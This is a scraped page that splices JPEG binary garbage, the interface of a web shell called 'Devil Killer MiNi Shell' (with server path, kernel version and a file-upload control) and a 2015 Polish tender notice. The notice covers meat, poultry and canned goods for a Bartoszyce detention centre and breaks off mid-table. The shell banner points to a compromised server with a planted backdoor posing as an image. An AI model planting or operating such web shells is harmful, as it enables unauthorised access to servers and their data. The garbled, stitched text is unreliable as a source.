JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150428/96982-N-2015.html

<p class="kh_header"><b>Bartoszyce: Przetarg nieograniczony na dostawy wyrobów mięsnych do AS w Bartoszycach</b><br>
<b>Numer ogłoszenia: 96982 - 2015; data zamieszczenia: 28.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Warszawska 5, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 89 7622294 w. 131, faks 89 7626254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy wyrobów mięsnych do AS w Bartoszycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I Wędliny wieprzowe

Rodzaj asortymentu:
Ilość kg.
Kod CPV
opis





Kiełbasa zwyczajna





700





151 31 130-5
Wyrób średnio rozdrobniony. Produkt otrzymany z mięsa wołowego i wieprzowego w osłonkach naturalnych wieprzowych o równej średnicy 26-28 mm i długości 30-40 cm, wędzony i parzony. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 





Kiełbasa parówkowa





700





151 31 130-5
Wyrób drobno rozdrobniony, z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, rozdrobniona do masy    homogennej w osłonce poliamidowej. Wyrób o równej średnicy na przekroju 18 - 20 mm (waga netto pojedynczego pęta musi wynosić 100 g.) Barwa w przekroju jasnoróżowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 






Mielonka kanapkowa






600






151 31 130-5
Wyrób średnio rozdrobniony, z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, wyrób w osłonce poliamidowej. Batony (prostokątne lub okragłe) o długości 30 - 40 cm. Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.  
Metka łososiowa
400
15131120-2
 Kiełbasa wieprzowa, tłusta, drobno rozdrobniona. Batony w osłonce sztucznej koloru łososiowego długości ok. 10 cm. Konsystencja miękka. Barwa na przekroju jasno łososiowa. Konsystencja miękka, smarowna. Smak i zapach charakterystyczne dla użytych przypraw, konsystencja pasty.








Mortadela śniadaniowa







700







151 31 130-5
Wyrób parzony drobno rozdrobniony, z mięsa wieprzowego, skórki wieprzowe oraz surowców tłuszczowych, wyrób w  osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy 60 - 80 mm . Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 





Parówki cienkie paluszki




700




151311305

Wyrób drobno rozdrobniony z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, rozdrobniona do masy homogennej w osłonce poliamidowej. waga netto pojedynczego pęta musi wynosić 100 g. Barwa w przekroju jasnoróżowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.  





Szynka mielona 
wieprzowa





500





151 31 130-5
Wyrób grubo rozdrobniony, z mięsa wieprzowego chudego , wyrób w osłonce białkowej. Okrągłe batony o długości 30 - 40 cm i równej średnicy na przekroju 100 mm. Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. Barwa w przekroju różowa do jasnoróżowej. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy .






Mielonka turystyczna






600






151 31 130-5
Wyrób średnio rozdrobniony, z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, wyrób w osłonce poliamidowej. Batony (prostokątne lub okragłe) o długości 30 - 40 cm. Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.  





Kaszanka baton





700





151 31 134-3
Wyrób w osłonie poliamidowej: powierzchnia czysta, osłonka ściśle przylegająca do farszu, w kształcie batonu, o średnicy na przekroju powyżej 100 mm i długości 40 -50 cm. Barwa ciemno-brunatna, kaszy szara z odcieniem brunatnym. Konsystencja ścisła, dobrze związana. Skład surowcowy: mięso i maski z głów wieprzowych, podgardle nie peklowane, wątroba wieprzowa nie solona, płuca wieprzowe, skórki wieprzowe, krew, kasza gryczana




Kaszanka jęczmienna




400




151 31 134-3
Wyrób w osłonie naturalnej: powierzchnia czysta, osłonka ściśle przylegająca do farszu, w pętkach, o średnicy 24-28mm i długości 20 -30 cm. Barwa ciemno-brunatna, kaszy szara z odcieniem brunatnym. Konsystencja ścisła, dobrze związana. Skład surowcowy: mięso i maski z głów wieprzowych, podgardle nie peklowane, wątroba wieprzowa nie solona, płuca wieprzowe, skórki wieprzowe, krew, kasza jęczmienna
Pasztetowa
600
15131310-1
Produkt z podrobów i surowców mięsnych , w osłonkach poliamidowych lub naturalnych w pętkach, o średnicy 24-28mm i długości 20 -30cm. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. 



Salceson włoski



700



151 31 100-6
Produkt z podrobów i surowców mięsnych parzony, w osłonkach poliamidowych o długości 30 -40 cm, i równej średnicy na przekroju 80 - 100 mm. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. 





Tuszonka





700





15131 130-5
Wyrób średnio rozdrobniony, z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, wyrób w osłonce poliamidowej. Batony (prostokątne) o długości 30-40 cm. Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy .






Blok łopatkowy






400






151 31 130-5

Wyrób grubo rozdrobniony, z mięsa wieprzowego , wyrób w  osłonce poliamidowej. Prostokątny baton o długości  30 - 40 cm . Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. Barwa w przekroju różowa do jasnoróżowej.  Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 







Kiełbasa biała parzona







700







151 31 130-5
Wyrób średnio rozdrobniony parzony, w osłonkach naturalnych o średnicy 26-28 mm i długości do 14 cm (waga netto pojedynczego pęta musi wynosić 100 g.), w skład której wchodzi: mięso wieprzowe 80 %, mięso wołowe 10 %, surowce uzupełniające, przyprawy i substancje dodatkowe dozwolone 10 %. Kawałki mięs związane masą wiążącą, równomiernie rozmieszczone na przekroju. Kształt i wielkość charakterystyczne dla sposobu uformowania wyrobów jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.


Salceson czarny 


600


151 31 100-6
Produkt z podrobów i surowców mięsnych parzony, w osłonkach poliamidowych o długości 30 -40 cm, i równej średnicy na przekroju 80 - 100 mm. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. 
Podgardle wędzone
300
15131200-7 

Wyrób z mięsa wieprzowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy .







Luncheon wieprzowy







600







151 31 130-5
Wyrób średnio rozdrobniony, z mięsa wieprzowego i wołowego oraz surowców tłuszczowych, wyrób w osłonce poliamidowej. Batony (prostokątne) o długości 30-40 cm. Osłonka ściśle przylegająca do farszu. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy .


Część II. Wędliny drobiowe.

Rodzaj asortymentu:
Ilość w kg.
Kod CPV
Opis






Zwyczajna drobiowa






500






151 31 135-0
Wyrób drobiowy, otrzymana z mięsa drobiowego i wieprzowego, podrobów, tłuszczów, przypraw i substancji dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla wyrobów drobiowych średnicy 26-28 mm i długości do 30 cm , (waga netto pojedynczego pęta powinna być podzielna przez 100 g ). Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 









Pieczeń drobiowa









500









151 31 135-0
Wyrób otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych o długości  30 - 40 cm i średnicy na przekroju powyżej 80 mm (w równych odcinkach) . Na przekroju - barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm, nie powinny się rozpadać.  Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 









Szynka drobiowa mielona









800









151 31 135-0
Wyrób drobiowy parzony drobno rozdrobniony, z mięsa drobiowego , mięso oddzielone mechaniczne z kurczaka, wyrób w osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy na przekroju 60 - 80 mm. Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 
Paprykarz drobiowy
500
151 31 135-0
Wyrób otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony  o długości  30 - 40 cm i średnicy na przekroju powyżej 80 mm (w równych odcinkach) .   Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 






Mielonka drobiowa








450







151 31 135-0

Wyrób drobiowy parzony drobno rozdrobniony, z mięsa drobiowego i wieprzowego, skórki wieprzowe, mięso oddzielone mechaniczne z kurczaka, wyrób w osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy na przekroju 60 - 80 mm. Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 








Blok drobiowy








400








151 31 135-0
Wyrób otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych o długości  30 - 40 cm i średnicy na przekroju powyżej 80 mm (w równych odcinkach) . Na przekroju - barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm, nie powinny się rozpadać. Smak i zapach charakterystyczny dla szynki z mięsa drobiowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 






Mielonka drobiowa 
wędzona






700






151 31 135-0
Wyrób drobiowy parzony drobno rozdrobniony, z mięsa drobiowego i wieprzowego, skórki wieprzowe, mięso oddzielone mechaniczne z kurczaka, wyrób w osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy na przekroju 60 - 80 mm. Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.





Serdelki drobiowe





800





151 31 135-0
Wyrób drobno rozdrobniony, z podrobów drobiowych i wieprzowych oraz surowców tłuszczowych, rozdrobniona do masy homogennej w osłonce naturalnej. Wyrób o równej średnicy na przekroju 28 - 32 mm (waga netto pojedynczego pęta musi wynosić 100 g.) pozostawione w zwojach. Powierzchnia barwy różowej do jasnobrązowej konsystencji dość ścisła, elastyczna. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 








Polędwica drobiowa








350








151 31 135-0
Produkt otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych  o długości 30-40 cm i średnicy na przekroju 100 mm (w równych odcinkach) . Barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm nie powinny się rozpadać. Smak i zapach charakterystyczny dla szynki z mięsa drobiowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 







Szynka z piersi drobiowych








350








151 31 135-0
Produkt otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych  o długości 30-40 cm i średnicy na przekroju 100 mm (w równych odcinkach) . Barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm nie powinny się rozpadać. Smak i zapach charakterystyczny dla szynki z mięsa drobiowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.









Szynkówka drobiowa









350









151 31 135-0
Produkt otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych  o długości 30-40 cm i średnicy na przekroju 100 mm (w równych odcinkach) . Barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm nie powinny się rozpadać. Smak i zapach charakterystyczny dla szynki z mięsa drobiowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.








Kiełbasa mini drobiowa








400








151 31 135-0
Wyrób drobiowy parzony drobno rozdrobniony, z mięsa drobiowego i wieprzowego, skórki wieprzowe, mięso oddzielone mechaniczne z kurczaka, wyrób w osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy na przekroju 60 - 80 mm. Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy.












Szynka drobiowa













350













151 31 135-0
Produkt otrzymany z mięsa drobiowego, uzyskany z tuszek drobiowych, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych, zgodnie z recepturą i procesem technologicznym właściwym dla tego wyrobu. Wygląd - grube batony w osłonkach białkowych  o długości 30-40 cm i średnicy na przekroju 100 mm (w równych odcinkach) . Barwa jasnoróżowa do różowej z co najmniej 80 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych masą wiążącą, konsystencja ścisła, zwarta, plastry o grubości 1,5 mm nie powinny się rozpadać. Smak i zapach charakterystyczny dla szynki z mięsa drobiowego. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 






Kiełbasa kanapkowa drobiowa






600






151 31 135-0
Wyrób drobiowy parzony drobno rozdrobniony, z mięsa drobiowego i wieprzowego, skórki wieprzowe, mięso oddzielone mechaniczne z kurczaka, wyrób w osłonce poliamidowej. Baton okrągły o długości 30 - 40 cm i średnicy na przekroju 60 - 80 mm. Osłonka ściśle przylegająca do farszu. Masa równomiernie rozmieszczona, konsystencja miękka, plastyczna. Barwa w przekroju kremowo - różowa. Kształt i wielkość charakterystyczna dla sposobu uformowania wyrobu jednolita pod względem gramatury, kształtu i wyglądu musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy. 



Pasztetowa drobiowa






500



15131135-0
Produkt z podrobów i surowców mięsnych , w osłonkach poliamidowych lub naturalnych w pętkach, o średnicy 24-28mm i długości 20 -30cm. Składniki równomiernie rozmieszczone, konsystencja miękka, plastyczna. 

Część III. Mięso drobiowe, podroby drobiowe
Rodzaj asortymentu:
Ilość w kg.
Kod CPV
Opis
Mięso mielone drobiowe
800
15112100-7
Mięso średnio rozdrobnione  ( mięso z drobiu ) , mięso przepuszczone przez sito z otworami o średnicy 3 mm).  Wygląd - opakowania od 400 do 500g. 
Serca drobiowe
400
15112100-7
Serca drobiowe świeże, nie mrożone.
Żołądki kurczęce
300
15112100-7
Żołądki drobiowe świeże, nie mrożone.




Udziec z kurczaka




400




15112100-7
Element z kurczaka zawierający udo i podudzie wraz z mięśniami i skórą, bez miednicy i grzbietu. Uda powinny być właściwie umięśnione, linie cięć równe, gładkie, mięso prawidłowo wykrwawione, skóra bez przebarwień oraz resztek upierzenia, zapach swoisty dla mięsa drobiowego świeżego , waga 1 szt. od 250 do 300 g. Mięso schłodzone , nie mrożone. 
Mięso potrawkowe drobiowe
300
15112100-7
Całe skrawki mięsa drobiowego  (mięso  - przepuszczone przez sito z otworami owalnymi) .  Powierzchnia czysta, nie zakrwawiona, bez opiłków kości. Wygląd 
- w równych odcinkach. Pakowanie: po 500g.
Skrzydełka z kurczaka
300
15112100-7
Element z kurczaka zawierający skrzydło wraz z mięśniami i skórą,  grzbietu. Skrzydła powinny być właściwie umięśnione, linie cięć równe, gładkie, mięso prawidłowo wykrwawione, skóra bez przebarwień oraz resztek upierzenia, zapach swoisty dla mięsa drobiowego świeżego , waga 1 szt. od 100 do 300 g. Mięso schłodzone , nie mrożone. 
Filet z kurczaka
300
15112100-7
Filety z kurczaka (pierś) powinny być właściwie umięśnione, linie cięć równe, gładkie, mięso prawidłowo wykrwawione, skóra bez przebarwień oraz resztek upierzenia, zapach swoisty dla mięsa drobiowego świeżego , waga 1 szt. od 100 do 300 g. Mięso schłodzone , nie mrożone. 

 Część IV Konserwy
Rodzaj asortymentu:
Ilość w kg.
Kod CPV
Opis
Pasztet z indyka 290 -300g.
400
15131000- 5
- masa netto puszki 290 -330. gram;  
 - puszka wyposażona uchwyt do otwierania;
  - niska zawartość tłuszczy, nie więcej niż 30 %;
   - konserwy muszą być dobrej jakości, o dobrych walorach smakowych;
  - konsystencja farszu konserw jednolita bez zgrupowań tłuszczu na bokach lub wieczkach;

Konserwa turystyczna 300g
400
15131000- 5
 - masa netto puszki 300 gram;  
 - puszka wyposażona uchwyt do otwierania;
  - niska zawartość tłuszczy, nie więcej niż 30 %;
   - konserwy muszą być dobrej jakości, o dobrych walorach smakowych;
  - konsystencja farszu konserw jednolita bez zgrupowań tłuszczu na bokach lub wieczkach;

Smalec domowy z przyprawami 120 -150g.
100
15131000- 5
- masa netto puszki 120-150 gram;  
   - konserwy muszą być dobrej jakości, o dobrych walorach smakowych;
 - konsystencja farszu konserw jednolita bez zgrupowań tłuszczu na bokach lub wieczkach
Pasztet mazowiecki 290 -300g.
400
15131000- 5
- masa netto puszki 290 -330. gram;  
 - puszka wyposażona uchwyt do otwierania;
  - niska zawartość tłuszczy, nie więcej niż 30 %;
   - konserwy muszą być dobrej jakości, o dobrych walorach smakowych;
  - konsystencja farszu konserw jednolita bez zgrupowań tłuszczu na bokach lub wieczkach;

Pasztet drobiowy 120 -150g.
350
15131000- 5
- masa netto puszki 120-150 gram;  
- niska zawartość tłuszczy, nie więcej niż 30 %;
 - konserwy muszą być dobrej jakości, o dobrych walorach smakowych;
- konsystencja farszu konserw jednolita bez zgrupowań tłuszczu na bokach lub wieczkach

 Część V Mięso wieprzowe, wołowe, podroby wieprzowe
Rodzaj asortymentu:
Ilość w kg.
Kod CPV
Opis


Mięso szarpane -
 wołowe



300



151 11 190-7
